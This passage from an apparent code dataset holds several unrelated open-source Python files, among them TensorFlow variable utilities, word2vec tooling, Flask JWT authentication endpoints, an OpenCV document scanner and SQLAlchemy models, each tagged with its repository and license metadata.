use_locking: If `True`, use locking during the operation.
Returns:
A `Tensor` that will hold the new value of this variable after
the addition has completed.
"""
return state_ops.assign_add(self._variable, delta, use_locking=use_locking)
def assign_sub(self, delta, use_locking=False):
"""Subtracts a value from this variable.
This is essentially a shortcut for `assign_sub(self, delta)`.
Args:
delta: A `Tensor`. The value to subtract from this variable.
use_locking: If `True`, use locking during the operation.
Returns:
A `Tensor` that will hold the new value of this variable after
the subtraction has completed.
"""
return state_ops.assign_sub(self._variable, delta, use_locking=use_locking)
def scatter_sub(self, sparse_delta, use_locking=False):
"""Subtracts `IndexedSlices` from this variable.
This is essentially a shortcut for `scatter_sub(self, sparse_delta.indices,
sparse_delta.values)`.
Args:
sparse_delta: `IndexedSlices` to be subtracted from this variable.
use_locking: If `True`, use locking during the operation.
Returns:
A `Tensor` that will hold the new value of this variable after
the scattered subtraction has completed.
Raises:
ValueError: if `sparse_delta` is not an `IndexedSlices`.
"""
if not isinstance(sparse_delta, ops.IndexedSlices):
raise ValueError("sparse_delta is not IndexedSlices: %s" % sparse_delta)
return state_ops.scatter_sub(self._variable,
sparse_delta.indices,
sparse_delta.values,
use_locking=use_locking)
def count_up_to(self, limit):
"""Increments this variable until it reaches `limit`.
When that Op is run it tries to increment the variable by `1`. If
incrementing the variable would bring it above `limit` then the Op raises
the exception `OutOfRangeError`.
If no error is raised, the Op outputs the value of the variable before
the increment.
This is essentially a shortcut for `count_up_to(self, limit)`.
Args:
limit: value at which incrementing the variable raises an error.
Returns:
A `Tensor` that will hold the variable value before the increment. If no
other Op modifies this variable, the values produced will all be
distinct.
"""
return state_ops.count_up_to(self._variable, limit=limit)
# Conversion to tensor.
@staticmethod
def _TensorConversionFunction(v, dtype=None, name=None, as_ref=False):
"""Utility function for converting a Variable to a Tensor."""
_ = name
if dtype and not dtype.is_compatible_with(v.dtype):
raise ValueError(
"Incompatible type conversion requested to type '%s' for variable "
"of type '%s'" % (dtype.name, v.dtype.name))
if as_ref:
return v.ref()
else:
return v.value()
# Operator overloading.
#
# To carry over all overloaded operators from ops.Tensor to Variable, we
# register the _RunOp() static method as the implementation of all operators.
# That function dynamically discovers the overloaded operator in ops.Tensor
# and invokes it after converting the Variable to a tensor.
@staticmethod
def _OverloadAllOperators():
"""Register overloads for all operators."""
for operator in ops.Tensor.OVERLOADABLE_OPERATORS:
Variable._OverloadOperator(operator)
@staticmethod
def _OverloadOperator(operator):
"""Register _RunOp as the implementation of 'operator'.
Args:
operator: string. The operator name.
"""
if operator in ["__invert__", "__neg__", "__abs__"]:
setattr(Variable, operator, lambda a: Variable._RunOp(operator, a, None))
else:
setattr(Variable, operator, lambda a, b: Variable._RunOp(operator, a, b))
@staticmethod
def _RunOp(operator, a, b):
"""Run the operator 'op' for 'a'.
Args:
operator: string. The operator name.
a: A Variable.
b: Second argument to the operator. None if unary.
Returns:
The result of the operator.
"""
# pylint: disable=protected-access
if b is not None:
return getattr(ops.Tensor, operator)(a._AsTensor(), b)
else:
return getattr(ops.Tensor, operator)(a._AsTensor())
# pylint: enable=protected-access
@property
def name(self):
"""The name of this variable."""
return self._variable.name
@property
def initializer(self):
"""The initializer operation for this variable."""
return self._initializer_op
@property
def device(self):
"""The device of this variable."""
return self._variable.device
@property
def dtype(self):
"""The `DType` of this variable."""
return self._variable.dtype
@property
def op(self):
"""The `Operation` of this variable."""
return self._variable.op
@property
def graph(self):
"""The `Graph` of this variable."""
return self._variable.graph
def get_shape(self):
"""The `TensorShape` of this variable.
Returns:
A `TensorShape`.
"""
return self._variable.get_shape()
def to_proto(self):
"""Converts a `Variable` to a `VariableDef` protocol buffer.
Returns:
A `VariableDef` protocol buffer.
"""
var_def = variable_pb2.VariableDef()
var_def.variable_name = self._variable.name
var_def.initializer_name = self.initializer.name
var_def.snapshot_name = self._snapshot.name
if self._save_slice_info:
var_def.save_slice_info_def.MergeFrom(self._save_slice_info.to_proto())
return var_def
@staticmethod
def from_proto(variable_def):
"""Returns a `Variable` object created from `variable_def`."""
return Variable(variable_def=variable_def)
# Experimental support for saving variables as slices of a larger variable.
class SaveSliceInfo(object):
"""Information on how to save this Variable as a slice."""
def __init__(self, full_name=None, full_shape=None, var_offset=None,
var_shape=None, save_slice_info_def=None):
"""Create a `SaveSliceInfo`.
Args:
full_name: Name of the full variable of which this `Variable` is a
slice.
full_shape: Shape of the full variable, as a list of int.
var_offset: Offset of this `Variable` into the full variable, as a
list of int.
var_shape: Shape of this `Variable`, as a list of int.
save_slice_info_def: `SaveSliceInfoDef` protocol buffer. If not `None`,
recreates the SaveSliceInfo object its contents.
`save_slice_info_def` and other arguments are mutually
exclusive.
"""
if save_slice_info_def:
assert isinstance(save_slice_info_def, variable_pb2.SaveSliceInfoDef)
self.full_name = save_slice_info_def.full_name
self.full_shape = [i for i in save_slice_info_def.full_shape]
self.var_offset = [i for i in save_slice_info_def.var_offset]
self.var_shape = [i for i in save_slice_info_def.var_shape]
else:
self.full_name = full_name
self.full_shape = full_shape
self.var_offset = var_offset
self.var_shape = var_shape
@property
def spec(self):
"""Computes the spec string used for saving."""
full_shape_str = " ".join(["%d" % d for d in self.full_shape]) + " "
sl_spec = ":".join([
"%d,%d" % (o, s) for o, s in zip(self.var_offset, self.var_shape)])
return full_shape_str + sl_spec
def to_proto(self):
"""Returns a SaveSliceInfoDef() proto."""
save_slice_info_def = variable_pb2.SaveSliceInfoDef()
save_slice_info_def.full_name = self.full_name
for i in self.full_shape:
save_slice_info_def.full_shape.append(i)
for i in self.var_offset:
save_slice_info_def.var_offset.append(i)
for i in self.var_shape:
save_slice_info_def.var_shape.append(i)
return save_slice_info_def
def _set_save_slice_info(self, save_slice_info):
"""Sets the slice info for this `Variable`.
Args:
save_slice_info: A `Variable.SaveSliceInfo` object.
"""
self._save_slice_info = save_slice_info
def all_variables():
"""Returns all variables that must be saved/restored.
The `Variable()` constructor automatically adds new variables to the graph
collection `GraphKeys.VARIABLES`. This convenience function returns the
contents of that collection.
Returns:
A list of `Variable` objects.
"""
return ops.get_collection(ops.GraphKeys.VARIABLES)
def trainable_variables():
"""Returns all variables created with `trainable=True`.
When passed `trainable=True`, the `Variable()` constructor automatically
adds new variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES`. This convenience function returns the
contents of that collection.
Returns:
A list of Variable objects.
"""
return ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def local_variables():
"""Returns all variables created with collection=[LOCAL_VARIABLES].
Returns:
A list of local Variable objects.
"""
return ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def moving_average_variables():
"""Returns all variables that maintain their moving averages.
If an `ExponentialMovingAverage` object is created and the `apply()`
method is called on a list of variables, these variables will
be added to the `GraphKeys.MOVING_AVERAGE_VARIABLES` collection.
This convenience function returns the contents of that collection.
Returns:
A list of Variable objects.
"""
return ops.get_collection(ops.GraphKeys.MOVING_AVERAGE_VARIABLES)
def initialize_variables(var_list, name="init"):
"""Returns an Op that initializes a list of variables.
After you launch the graph in a session, you can run the returned Op to
initialize all the variables in `var_list`. This Op runs all the
initializers of the variables in `var_list` in parallel.
Calling `initialize_variables()` is equivalent to passing the list of
initializers to `Group()`.
If `var_list` is empty, however, the function still returns an Op that can
be run. That Op just has no effect.
Args:
var_list: List of `Variable` objects to initialize.
name: Optional name for the returned operation.
Returns:
An Op that run the initializers of all the specified variables.
"""
if var_list:
return control_flow_ops.group(
*[v.initializer for v in var_list], name=name)
return control_flow_ops.no_op(name=name)
def initialize_all_variables():
"""Returns an Op that initializes all variables.
This is just a shortcut for `initialize_variables(all_variables())`
Returns:
An Op that initializes all variables in the graph.
"""
return initialize_variables(all_variables())
def initialize_local_variables():
"""Returns an Op that initializes all local variables.
This is just a shortcut for `initialize_variables(local_variables())`
Returns:
An Op that initializes all local variables in the graph.
"""
return initialize_variables(local_variables())
def is_variable_initialized(variable):
"""Tests if a variable has been initialized.
Args:
variable: A `Variable`.
Returns:
Returns a scalar boolean Tensor, `True` if the variable has been
initialized, `False` otherwise.
"""
return state_ops.is_variable_initialized(variable)
def assert_variables_initialized(var_list=None):
"""Returns an Op to check if variables are initialized.
NOTE: This function is obsolete and will be removed in 6 months. Please
change your implementation to use `report_uninitialized_variables()`.
When run, the returned Op will raise the exception `FailedPreconditionError`
if any of the variables has not yet been initialized.
Note: This function is implemented by trying to fetch the values of the
variables. If one of the variables is not initialized a message may be
logged by the C++ runtime. This is expected.
Args:
var_list: List of `Variable` objects to check. Defaults to the
value of `all_variables().`
Returns:
An Op, or None if there are no variables.
"""
if var_list is None:
var_list = all_variables() + local_variables()
# Backwards compatibility for old-style variables. TODO(touts): remove.
if not var_list:
var_list = []
for op in ops.get_default_graph().get_operations():
if op.type in ["Variable", "AutoReloadVariable"]:
var_list.append(op.outputs[0])
if not var_list:
return None
else:
ranks = []
for var in var_list:
with ops.colocate_with(var.op):
ranks.append(array_ops.rank(var))
if len(ranks) == 1:
return ranks[0]
else:
return array_ops.pack(ranks)
def report_uninitialized_variables(var_list=None,
name="report_uninitialized_variables"):
"""Adds ops to list the names of uninitialized variables.
When run, it returns a 1-D tensor containing the names of uninitialized
variables if there are any, or an empty array if there are none.
Args:
var_list: List of `Variable` objects to check. Defaults to the
value of `all_variables() + local_variables()`
name: Optional name of the `Operation`.
Returns:
A 1-D tensor containing names of the unintialized variables, or an empty 1-D
tensor if there are no variables or no uninitialized variables.
"""
if var_list is None:
var_list = all_variables() + local_variables()
# Backwards compatibility for old-style variables. TODO(touts): remove.
if not var_list:
var_list = []
for op in ops.get_default_graph().get_operations():
if op.type in ["Variable", "AutoReloadVariable"]:
var_list.append(op.outputs[0])
if not var_list:
# Return an empty tensor so we only need to check for returned tensor
# size being 0 as an indication of model ready.
return array_ops.constant([], dtype=dtypes.string, name=name)
else:
# Get a 1-D boolean tensor listing whether each variable is initialized.
variables_mask = math_ops.logical_not(array_ops.pack(
[state_ops.is_variable_initialized(v) for v in var_list]))
# Get a 1-D string tensor containing all the variable names.
variable_names_tensor = array_ops.constant([s.op.name for s in var_list])
# Return a 1-D tensor containing all the names of uninitialized variables.
return array_ops.boolean_mask(variable_names_tensor, variables_mask,
name=name)
# pylint: disable=protected-access
ops.register_tensor_conversion_function(Variable,
Variable._TensorConversionFunction)
Variable._OverloadAllOperators()
# pylint: enable=protected-access
ops.register_dense_tensor_like_type(Variable)
ops.register_proto_function(ops.GraphKeys.VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=Variable.to_proto,
from_proto=Variable.from_proto)
ops.register_proto_function(ops.GraphKeys.TRAINABLE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=Variable.to_proto,
from_proto=Variable.from_proto)
ops.register_proto_function(ops.GraphKeys.MOVING_AVERAGE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=Variable.to_proto,
from_proto=Variable.from_proto)
|
ivano666/tensorflow
|
tensorflow/python/ops/variables.py
|
Python
|
apache-2.0
| 36,340
|
import numpy as np
import struct
import sys
from num2words import num2words
import re
def toDicVec(filename):
"""
Creates a dic with 'word':np_array from text vector files.
"""
dic = {}
first = True
vecfile = open(filename, "r")
vecfile.readline() # 1st line = useless
for line in vecfile:
for word in line.split(" "):
if(first):
key = word
dic[key] = []
first = False
else:
dic[key].append(word)
dic[key].pop()
first = True
for key in dic:
dic[key] = np.array(dic[key], float)
return dic
def wordCorpusSum(filename, corpus, gramsize, hashbangs, vsize):
"""
creates a word dictionnary of word in corpus with vectors being the sumation of the ngrams (overlapping) in file filename
"""
dic = toDicVec(filename)
wordDic = {}
errorCpt = 0
cfile = open(corpus, "r")
for line in cfile:
for word in line.split(" "):
if word in wordDic:
continue
key = word
if(hashbangs):
word = '#'+word+'#'
start = 0
end = gramsize
vec = np.zeros(vsize)
while end <= len(word):
try:
vec = np.add(vec, dic[word[start:end]])
except:
#print "the %d-gram %s from word %s is not in the dictionnary "%(gramsize,word[start:end],word)
end = end+1
start = start+1
errorCpt += 1
continue
end = end+1
start = start+1
wordDic[key] = vec
print "%d grams where missing from vocabulary" % (errorCpt)
return wordDic
def bin2dic(filename,wordlist=[]):
"""
transform binary file from word2vec in a dictionnary (with only words from wordlist if not empty):
returns: return {"dic" "vocab_size" "vector_size" "ngram_size" "hashbang" "position"}
"""
f = open(filename, "rb")
dic = {}
gram = ""
try:
line = f.readline()
infoline = line.split(" ")
vocab_size = int(infoline[0])
vector_size = int(infoline[1])
try:
ngram_size = int(infoline[2])
hashbang = int(infoline[3])
position = int(infoline[4])
except:
ngram_size = 0
hashbang = 0
position = 0
line = f.readline()
while line != "":
if len(gram) > 0 and wordlist != [] and gram not in wordlist:
del dic[gram]
else:
print gram
fullline = line.split(" ", 1)
gram = fullline[0]
dic[gram] = []
if len(fullline) < 2:
nextline = f.readline()
fullline.append(nextline)
bs = bytearray(fullline[1])
i = 0
while True:
while len(bs) < vector_size*4+1:
nextline = bytearray(f.readline())
for b in nextline:
bs.append(b)
num = struct.unpack('f', bs[i:i+4])
dic[gram].append(num[0])
i += 4
if i >= len(bs)-1:
break
if len(dic[gram]) != vector_size:
print "error on vec gram: %s lenght %d instead of %s" % (gram, len(dic[gram]), vector_size)
line = f.readline()
finally:
f.close()
return {"dic": dic, "vocab_size": vocab_size, "vector_size": vector_size, "ngram_size": ngram_size, "hashbang": hashbang, "position": position}
def cleanfile(filename, output, stats=True):
"""
cleans a corpus from punctation.
"""
if stats:
num_lines = sum(1 for line in open(filename))
i = 0
fin = open(filename, "r")
fou = open(output, "w")
delChars = [".", "?", "!", ",", "\"", "(", ")", "{", "}", ":", ";", "#", "*", "/", "\\", "'", "-"]
for line in fin:
if len(line) > 1:
for char in delChars:
line = line.replace(char, "")
line = line.replace("&", "and")
nums = re.findall(r'\d+', line)
for num in nums:
o = num
n = str(" "+num2words(int(num))+" ")
line = line.replace(o, n)
fou.write(line)
if stats:
i += 1
percent = i/float(num_lines)*100
sys.stdout.write("\r (%d/%d) %d%% " % (i, num_lines, percent))
sys.stdout.flush()
print "\n"
|
cedias/word2vec
|
script-tools/tooling.py
|
Python
|
apache-2.0
| 4,674
|
# coding=utf-8
from __future__ import absolute_import, unicode_literals
from datetime import datetime
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy import DateTime, Boolean, Text
from sqlalchemy.orm import relationship, backref
from flask import url_for
from ..core import db
from ..utils import to_bytes
from ..note.models import Note
class Book(db.Model):
__tablename__ = 'book'
id = Column(Integer, primary_key=True)
douban_id = Column(String(20), nullable=False, unique=True)
title = Column(String(100), nullable=False)
author = Column(String(100), nullable=False)
cover = Column(String(200))
pubdate = Column(String(20))
summary = Column(Text)
notes = relationship(
'Note',
backref='book',
cascade='all, delete-orphan',
lazy="dynamic",
order_by=lambda: Note.created.desc()
)
@property
def alt(self):
if self.douban_id:
return 'http://book.douban.com/subject/{id}'.format(id=self.douban_id)
return ''
@property
def absolute_url(self):
return url_for('book.index', book_id=self.id)
def __repr__(self):
return b'<Book({id}, {title})>'.format(
id=self.id,
title=to_bytes(self.title)
)
class UserBook(db.Model):
__tablename__ = 'user_book'
user_id = Column(Integer, ForeignKey('user.id'), primary_key=True)
book_id = Column(Integer, ForeignKey('book.id'), primary_key=True)
evernote_guid = Column(String(36))
updated = Column(DateTime, index=True, default=datetime.now)
status = Column(String(7), nullable=False, default="reading", index=True)
enable_sync = Column(Boolean, default=True, index=True)
# bidirectional attribute/collection of "user"/"user_books"
user = relationship(
'User',
backref=backref(
'user_books',
lazy='dynamic',
cascade='all, delete-orphan'
)
)
# reference to the "Book" object
book = relationship(
'Book',
backref=backref(
'user_books',
lazy='dynamic',
cascade='all, delete-orphan'
)
)
def __init__(self, user, book,
updated=None, status='reading',
enable_sync=True, evernote_guid=None):
self.user = user
self.book = book
self.updated = updated or datetime.now()
self.status = status
self.enable_sync = enable_sync
self.evernote_guid = evernote_guid
def __repr__(self):
return b'<UserBook({user_id}, {book_id})>'.format(
user_id=self.user_id,
book_id=self.book_id
)
|
messense/everbean
|
everbean/book/models.py
|
Python
|
mit
| 2,714
|
'''
Mapping from protein to ligand or from ligand to protein
'''
from sklearn.cluster import DBSCAN
import numpy
from Modular import LIGAND2PROTEININFO
def GetClusterAnnotate(distance_matrix, cluster_cri):
min_distance = 1 - cluster_cri
db = DBSCAN(eps=min_distance, min_samples=1, metric="precomputed").fit(D)
return db.labels_
def HistNumClusters(labels):
pass
if __name__ == "__main__":
pro_dict, lig_dict = ProteinLigandDict(LIGAND2PROTEININFO)
|
ajing/MOADNet
|
pycode/Clustering.py
|
Python
|
mit
| 479
|
import json
import jwt
from app import db
from app.auth.models import Users
from config import Config
from datetime import datetime, timedelta
from flask import jsonify, request
from flask_restful import Resource, abort
class Login(Resource):
"""
This class contains the login function.
"""
def get(self):
return jsonify({"message": "Welcome to the BucketList API."
" Register a new user by sending a"
" POST request to /auth/register. "
"Login by sending a POST request to"
" /auth/login to get started."})
def post(self):
data = json.loads(request.get_data(as_text=True))
if not data:
abort(
401,
message="No params passed. Kindly fill\
you username and password")
username = data['username']
password = data['password']
if not username or not password:
abort(401,
message="Kindly fill in the missing details")
user = Users.query.filter_by(username=username).first()
if not user :
abort(400, message="User does not exist")
if user.verify_password(password):
payload = {
'sub': user.id,
'exp': datetime.utcnow() + timedelta(minutes=30)
}
token = jwt.encode(payload, Config.SECRET_KEY, algorithm='HS256')
return jsonify({"message": "Welcome {}".format(user.username),
"token": token.decode('utf-8')})
abort(401, message="Invalid password")
class Register(Resource):
"""
This is the class for the registration resources.
GET: Provides the registration instructions.
POST: Adds a user o the database.
"""
def get(self):
return jsonify({"message": "To register,"
"send a POST request with username, password and email"
" to /auth/register."})
def post(self):
data = json.loads(request.get_data(as_text=True))
if not data:
abort(400,
message="No params passed. Kindly \
fill you username, email and password")
if len(data.keys()) < 3:
abort(400,
message="Ensure you provide a username, email and password")
if not data['username'] or not data['email'] or not data['password']:
abort(400,
message="Kindly fill in the missing details")
username = data['username']
email = data['email']
password = data['password']
if len(password) < 4:
abort(400,
message="Password should be 4 or more characters")
if '@' not in email or '.' not in email:
abort(400,
message="Invalid email address")
user = Users.query.filter_by(username=username).first()
if user is not None:
abort(400, message="User already exists")
try:
new_user = Users(
username=username,
email=email,
password=password
)
db.session.add(new_user)
db.session.commit()
return {'message': "{} created successfully".format(username)}, 201
except Exception as e:
abort(500, message= str(e))
#"User not created")
|
andela-gacheruevans/cp2-bucketlist
|
app/auth/controllers.py
|
Python
|
mit
| 3,482
|
#!/usr/bin/env python
"""
Commands related to syncing copytext from Google Docs.
"""
import app_config
from fabric.api import task
from oauth import get_document, get_credentials
from termcolor import colored
@task(default=True)
def update():
"""
Downloads a Google Doc as an Excel file.
"""
if app_config.COPY_GOOGLE_DOC_KEY == None:
print colored('You have set COPY_GOOGLE_DOC_KEY to None. If you want to use a Google Sheet, set COPY_GOOGLE_DOC_KEY to the key of your sheet in app_config.py', 'blue')
return
credentials = get_credentials()
if not credentials:
print colored('No Google OAuth credentials file found.', 'yellow')
print colored('Run `fab app` and visit `http://localhost:8000` to generate credentials.', 'yellow')
return
get_document(app_config.COPY_GOOGLE_DOC_KEY, app_config.COPY_PATH)
|
nprapps/books14
|
fabfile/text.py
|
Python
|
mit
| 878
|
#!/usr/bin/env python
__author__ = 'Aleksandar Gyorev'
__email__ = 'a.gyorev@jacobs-university.de'
import cv2
import numpy as np
import argparse
from transform import Transform
from basic_image import BasicImage
from combine_images import CombineImages
""" Arugment Parser """
ap = argparse.ArgumentParser()
ap.add_argument('-i',
'--image',
required = True,
help = 'path to the image')
ap.add_argument('-H',
'--height',
required = False,
default = 300,
help = 'height of the image image we will process and use for finding the contours (default: 300)')
ap.add_argument('-n',
'--noise',
required = False,
default = 0,
help = 'the level to which we remove noise and smaller details from the scan (default: 0, i.e. preserve everything')
ap.add_argument('-c',
'--closing',
required = False,
default = 3,
help = 'the size of the closing element after applying the Canny edge detector')
ap.add_argument('-a',
'--auto',
required = False,
action = 'store_true',
default = False,
help = 'if we want to have automatically set values for the height and closing when looking for objects')
ap.add_argument('-s',
'--save',
action = 'store_true',
default = False,
help = 'set the flag in order to save the extracted images to the current folder')
args = vars(ap.parse_args())
# Getting the user input
HEIGHT = int(args['height'])
NOISE_REMOVAL_LEVEL = max(int(args['noise']) * 2 - 1, 0)
CLOSING_SIZE = int(args['closing'])
bi = BasicImage(args['image'])
def scan():
""" Step 1: Edge Detection """
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # get the grayscale image
gray = cv2.bilateralFilter(gray, 11, 17, 17)
#gray = cv2.GaussianBlur(gray, (3, 3), 0) # with a bit of blurring
#BasicImage(gray).show()
# automatic Canny edge detection thredhold computation
high_thresh, thresh_im = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
low_thresh = high_thresh / 2.0
# zero-parameter automatic Canny edge detection (method 2)
# Vary the percentage thresholds that are determined (in practice 0.33 tends to give good approx. results)
# A lower value of sigma indicates a tighter threshold, whereas a larger value of sigma gives a wider threshold.
#sigma = 0.33
#v = np.median(gray)
#low_thresh = int(max(0, (1.0 - sigma) * v))
#high_thresh = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(gray, low_thresh, high_thresh) # detect edges (outlines) of the objects
#BasicImage(edged).show()
# since some of the outlines are not exactly clear, we construct
# and apply a closing kernel to close the gaps b/w white pixels
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (CLOSING_SIZE, CLOSING_SIZE))
closed = cv2.morphologyEx(edged, cv2.MORPH_CLOSE, kernel)
#BasicImage(closed).show()
""" Step 2: Finding Contours """
(contours, _) = cv2.findContours(closed.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
total = 0
# looping over the contours found
approx_all = []
for contour in contours:
# approximating the contour
contour = cv2.convexHull(contour)
peri = cv2.arcLength(contour, True)
approx = cv2.approxPolyDP(contour, 0.02 * peri, True)
area = cv2.contourArea(contour)
# we don't consider anything less than 5% of the whole image
if area < 0.05 * total_area:
continue
# if the approximated contour has 4 points, then assumer it is a book
# a book is a rectangle and thus it has 4 vertices
if len(approx) == 4:
cv2.drawContours(image, [approx], -1, (0, 255, 0), 4)
approx_all.append(approx)
total += 1
print 'Found %d books/papers in the image.' % total
#BasicImage(image).show()
# no point of displaying anything if we couldn't find any books
if total != 0:
""" Displaying all intermediate steps into one image """
top_row = CombineImages(300, original, gray)
bot_row = CombineImages(300, closed, image)
BasicImage(top_row).show()
BasicImage(bot_row).show()
#com_img = np.vstack((top_row, bot_row))
#BasicImage(com_img).show()
""" Step 3: Apply a Perspective Transform and Threshold """
total = 0
for approx in approx_all:
total += 1
warped = Transform.get_box_transform(original, approx.reshape(4, 2) * ratio)
#BasicImage(warped).show()
scan_warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)
scan_warped = cv2.medianBlur(scan_warped, NOISE_REMOVAL_LEVEL)
scan_warped = cv2.adaptiveThreshold(scan_warped, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
#BasicImage(scan_warped).show()
BasicImage(CombineImages(400, warped, scan_warped)).show()
# save the image
if args['save'] == True:
filename_color = 'scan%03d_color.jpg' % total
filename_scan = 'scan%03d_scan.jpg' % total
BasicImage(warped).save(filename_color)
BasicImage(scan_warped).save(filename_scan)
return total
if args['auto'] == False:
original = bi.get().copy()
ratio = original.shape[0] / float(HEIGHT)
image = bi.resize('H', HEIGHT)
total_area = image.shape[0] * image.shape[1]
#BasicImage(image).show()
scan()
else:
for auto_height in xrange(min(650, bi.get().shape[0]), 299, -50):
for auto_closing in xrange(6, 1, -1):
HEIGHT = auto_height
CLOSING_SIZE = auto_closing
original = bi.get().copy()
ratio = original.shape[0] / float(HEIGHT)
image = bi.resize('H', HEIGHT)
total_area = image.shape[0] * image.shape[1]
print 'auto_height = ', auto_height
print 'auto_closing= ', auto_closing
if scan() != 0:
exit(0)
|
agyorev/DocuScan
|
scan.py
|
Python
|
gpl-2.0
| 6,159
|
##########################################################################
#
# Copyright (c) 2007-2010, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from IECore import *
import os
import os.path
class FileDependenciesOp( Op ) :
def __init__( self ) :
Op.__init__( self, "Lists the dependencies of a file.",
Parameter(
name = "result",
description = "A list of required files and file sequences.",
defaultValue = StringVectorData()
)
)
self.parameters().addParameters(
[
FileNameParameter(
name = "file",
description = "The file to list dependencies for.",
defaultValue = "",
check = DirNameParameter.CheckType.MustExist,
extensions = " ".join( FileExaminer.supportedExtensions() ),
allowEmptyString = False,
),
BoolParameter(
name = "recurse",
description = "When on, recursively searches the file dependency tree and lists all results.",
defaultValue = False,
),
StringParameter(
name = "resultType",
description = "The format of the result",
defaultValue = "string",
presets = (
( "string", "string" ),
( "stringVector", "stringVector" ),
),
presetsOnly = True,
)
]
)
def doOperation( self, operands ) :
files = set()
if operands["recurse"].value :
files = FileExaminer.allDependencies( operands["file"].value )
else :
files = FileExaminer.create( operands["file"].value ).dependencies()
if operands["resultType"].value == "string" :
return StringData( "\n".join( [str(s) for s in files] ) )
else :
return StringVectorData( [str(s) for s in files] )
registerRunTimeTyped( FileDependenciesOp )
|
code-google-com/cortex-vfx
|
python/IECore/FileDependenciesOp.py
|
Python
|
bsd-3-clause
| 3,313
|
"""
cat
Package init file
"""
from _version import __version__
class Box(object):
"""
A class that adheres to the Heisenberg interpretation of
Quantum Mechanics.
Consider: an object is locked in a box.
The object is either a list or a set. It is entangled.
When we observe it in a way that is definitively set-like,
say we ask for it's intersection, we Open The Box.
At this point, it resolves itself into a set, and will remain a set
in perpetuity.
Why is this useful you ask?
Well if you have to ask, then you almost certainly won't find the
answer satisfying.
If on the other hand you're the kind of person who responds to this
with:
"*excellent* - I want to do That Sort Of Thing all the time"
then congratulations - now you can.
"""
def __new__(klass):
klass.__mro__ = klass.box
|
davidmiller/cat
|
cat/__init__.py
|
Python
|
apache-2.0
| 871
|
# -*- coding: utf-8 -*-
#
# Copyright © 2014 René Samselnig
#
# This file is part of Database Navigator.
#
# Database Navigator is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Database Navigator is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Database Navigator. If not, see <http://www.gnu.org/licenses/>.
#
import logging
from sqlalchemy.exc import ProgrammingError, DataError
from dbmanagr.logger import LogWith
from dbmanagr.querybuilder import QueryBuilder, SimplifyMapper
from dbmanagr.comment import create_comment
from dbmanagr.exception import UnknownColumnException
from dbmanagr.model.baseitem import BaseItem
from dbmanagr.model.column import create_column
from dbmanagr.model.row import Row
from dbmanagr.model import DEFAULT_LIMIT
OPTION_URI_VALUE_FORMAT = '%s%s/?%s'
logger = logging.getLogger(__name__)
class Table(BaseItem):
def __init__(
self,
entity=None,
uri=None,
owner=None,
size=None,
name=None,
primary_key=None,
columns=None):
self.name = None
if entity is not None:
self.name = entity.name
elif name is not None:
self.name = name
self._entity = entity
self.uri = uri
self.owner = owner
self.size = size
if entity is not None:
self._columns = map(
lambda c: create_column(self, str(c.name), c), entity.columns)
elif columns is not None:
self._columns = map(
lambda c: create_column(self, c), columns)
else:
self._columns = None
self._fks = {}
self.primary_key = primary_key
def __repr__(self):
return self.name
def autocomplete(self):
return self.autocomplete_()
def autocomplete_(
self, column=None, value=None, format_=OPTION_URI_VALUE_FORMAT):
"""Retrieves the autocomplete string for the given column and value"""
if column is None:
return u'%s%s?' % (self.uri, self.name)
tablename = self.name
if type(value) is buffer:
value = '[BLOB]'
else:
value = u'%s=%s' % (column, value)
return format_ % (self.uri, tablename, value)
def entity(self):
return self._entity
def columns(self, needle=None):
"""Retrieves columns of table with optional filter applied"""
if needle is None:
return self._columns
return filter(lambda c: needle in c.name, self._columns)
def column(self, name):
if type(name) is int:
return self._columns[name]
for col in self._columns:
if col.name == name:
return col
return None
@LogWith(logger, log_result=False, log_args=False)
def rows(
self,
connection,
filter_=None,
limit=DEFAULT_LIMIT,
simplify=None):
